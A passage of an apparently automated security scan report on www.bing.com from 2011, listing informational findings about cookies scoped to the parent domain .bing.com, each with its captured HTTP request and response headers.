Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:31 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...

16.251. http://www.bing.com/shopping/valentines-day-gift-ideas/r/144 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping/valentines-day-gift-ideas/r/144

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=4A7020392DCB444D8DB76BCC0389EA0B; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:53:15 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c77d64d3a6dd04333923fcc4e923d301a; expires=Mon, 28-Jan-2013 23:53:15 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:15 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shopping/valentines-day-gift-ideas/r/144 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38935
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:53:14 GMT
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:53:15 GMT
Connection: close
Set-Cookie: _SS=SID=4A7020392DCB444D8DB76BCC0389EA0B; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:53:15 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c77d64d3a6dd04333923fcc4e923d301a; expires=Mon, 28-Jan-2013 23:53:15 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:15 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...

16.252. http://www.bing.com/travel/content/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/travel/content/search

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=C3CD398E1DFA4C4F975438AABABE6119; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:07:54 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c668c910cbe204671b9924806983f4bab; expires=Tue, 29-Jan-2013 17:07:54 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621027&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:07:54 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/content/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 22087
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:07:54 GMT
Connection: close
Set-Cookie: JSESSIONID=37564E6E7F080774679ECF5997C16D07; Path=/travel
Set-Cookie: _SS=SID=C3CD398E1DFA4C4F975438AABABE6119; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:07:54 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c668c910cbe204671b9924806983f4bab; expires=Tue, 29-Jan-2013 17:07:54 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621027&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:07:54 GMT; domain=.bing.com; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">

...[SNIP]...

16.253. http://www.bing.com/videos/browse previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/browse

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_FS=mkt=en-US; domain=.bing.com; path=/
_SS=SID=2D09A236B6E24F73B2FF4D79F9A09F8F; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:22 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ca44d79e193c249f0bbd1b7d6be21f3bc; expires=Mon, 28-Jan-2013 23:52:22 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:22 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/browse?mkt=en-us&vid= HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16423
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:22 GMT
Connection: close
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Set-Cookie: _SS=SID=2D09A236B6E24F73B2FF4D79F9A09F8F; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:22 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ca44d79e193c249f0bbd1b7d6be21f3bc; expires=Mon, 28-Jan-2013 23:52:22 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:22 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

16.254. http://www.bing.com/videos/results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/results.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

VIDSCHUSR=CLICKMODE=0&VMUTE=0&PARTNER=0; expires=Tue, 29-Jan-2013 17:11:47 GMT; domain=.bing.com; path=/videos
_HOP=I=2&TS=1296407507; domain=.bing.com; path=/
_UR=OMW=0; expires=Tue, 29-Jan-2013 17:11:47 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/results.aspx HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/challenge
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=1; _SS=SID=4318D78D50E640FC90E674B1FECFA468&hIm=178; RMS=F=O; MUID=DC63BAA44C3843F38378B4BB213E0A6F; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; SRCHD=SM=1&MS=1621031&D=1593447&AF=NOFORM; _FP=BDCE=129409675061634862&BDCEH=4B00CE098126B4CE6DFFB8D547F7B893; _HOP=I=1&TS=1296407506

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/videos/browse
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sun, 30 Jan 2011 17:11:47 GMT
Connection: close
Set-Cookie: VIDSCHUSR=CLICKMODE=0&VMUTE=0&PARTNER=0; expires=Tue, 29-Jan-2013 17:11:47 GMT; domain=.bing.com; path=/videos
Set-Cookie: _HOP=I=2&TS=1296407507; domain=.bing.com; path=/
Set-Cookie: _UR=OMW=0; expires=Tue, 29-Jan-2013 17:11:47 GMT; domain=.bing.com; path=/

16.255. http://www.bing.com/videos/results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/results.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

VIDSCHUSR=CLICKMODE=0&VMUTE=0&PARTNER=0; expires=Mon, 28-Jan-2013 23:52:16 GMT; domain=.bing.com; path=/videos
_HOP=I=1&TS=1296345136; domain=.bing.com; path=/
_SS=SID=CBF8869E7B494B8F8A49EA37CACDCF50; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:16 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/videos/browse
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:52:16 GMT
Connection: close
Set-Cookie: VIDSCHUSR=CLICKMODE=0&VMUTE=0&PARTNER=0; expires=Mon, 28-Jan-2013 23:52:16 GMT; domain=.bing.com; path=/videos
Set-Cookie: _HOP=I=1&TS=1296345136; domain=.bing.com; path=/
Set-Cookie: _SS=SID=CBF8869E7B494B8F8A49EA37CACDCF50; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:16 GMT; domain=.bing.com; path=/

16.256. http://www.bing.com/videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=AD764BCD76884B30A752348A7C436D27; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:26 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c8ea69017aa2940ddbc58f461fcf7f67e; expires=Mon, 28-Jan-2013 23:52:26 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:26 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 69772
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 00:07:26 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.047 secs
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:26 GMT
Connection: close
Set-Cookie: _SS=SID=AD764BCD76884B30A752348A7C436D27; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:26 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c8ea69017aa2940ddbc58f461fcf7f67e; expires=Mon, 28-Jan-2013 23:52:26 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:26 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

16.257. http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

from=en-us_msnhp; domain=.bing.com; path=/videos
gt1=42007; domain=.bing.com; path=/videos
ocid=42007; domain=.bing.com; path=/videos
_SS=SID=FE632F9AB87C4452AFEDD763816ED419; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:01:54 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c5525b056b9174877ae080754e0e2103b; expires=Tue, 29-Jan-2013 17:01:54 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621021&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:01:54 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo?q=Rhino&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42007 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

16.258. http://www.bing.com/videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

from=en-us_msnhp; domain=.bing.com; path=/videos
gt1=42008; domain=.bing.com; path=/videos
ocid=42008; domain=.bing.com; path=/videos
_SS=SID=2A046439AE0C4BEAB039A3EF561EA0B8; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:33 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cf0337bd634414bfa98e57cfaca8fdb9c; expires=Tue, 29-Jan-2013 17:00:33 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:33 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo?q=who+do+you+think+you+are&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

16.259. http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

from=en-us_msnhp; domain=.bing.com; path=/videos
gt1=42007; domain=.bing.com; path=/videos
ocid=42007; domain=.bing.com; path=/videos
_SS=SID=71398422999D4434A086293033409942; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:01:03 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c90f8b31c25db49fb9066aaa59d9cc4f4; expires=Tue, 29-Jan-2013 17:01:03 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621021&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:01:04 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs?rs=glee&from=en-us_msnhp&form=MSNRLL&GT1=42007 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

16.260. http://www.bing.com/videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

from=en-us_msnhp; domain=.bing.com; path=/videos
gt1=31036; domain=.bing.com; path=/videos
ocid=31036; domain=.bing.com; path=/videos
_SS=SID=B5B3B7F99F7E42BBBB4D99A3E9BD0689; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:31 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2caf34df9069e94b079e21d3eb6a21ddf2; expires=Tue, 29-Jan-2013 17:00:31 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:32 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o?q=health+care&rel=msn&from=en-us_msnhp&form=msnrll&gt1=31036 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

16.261. http://www.bing.com/videos/watch/video/michaels-new-friend/17w7aehdt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/michaels-new-friend/17w7aehdt

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

from=en-us_msnhp; domain=.bing.com; path=/videos
gt1=42008; domain=.bing.com; path=/videos
ocid=42008; domain=.bing.com; path=/videos
_SS=SID=7FC2B9E0CBF74E82B9CBB24E9A9E9968; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:41 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c1794478ef78b42b7a8959b47602883b6; expires=Mon, 28-Jan-2013 23:52:41 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:41 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/michaels-new-friend/17w7aehdt?q=ricky+gervais+office&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

16.262. http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

from=en-us_msnhp; domain=.bing.com; path=/videos
_SS=SID=189D8011DB3941A584C4CAEF4613E7B3; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:37 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c47c05fe66c744af789142972f6f75ef7; expires=Tue, 29-Jan-2013 17:00:37 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:38 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck?q=Weather+Forecast&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

16.263. http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

from=en-us_msnhp; domain=.bing.com; path=/videos
_SS=SID=B48B65D00BAF403892E682EAA8E2B594; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:02:39 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c33acc47a03c24f7995d266e4fbbb34ac; expires=Tue, 29-Jan-2013 17:02:39 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621022&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:02:39 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&from=en-us_msnhp HTTP/1.1
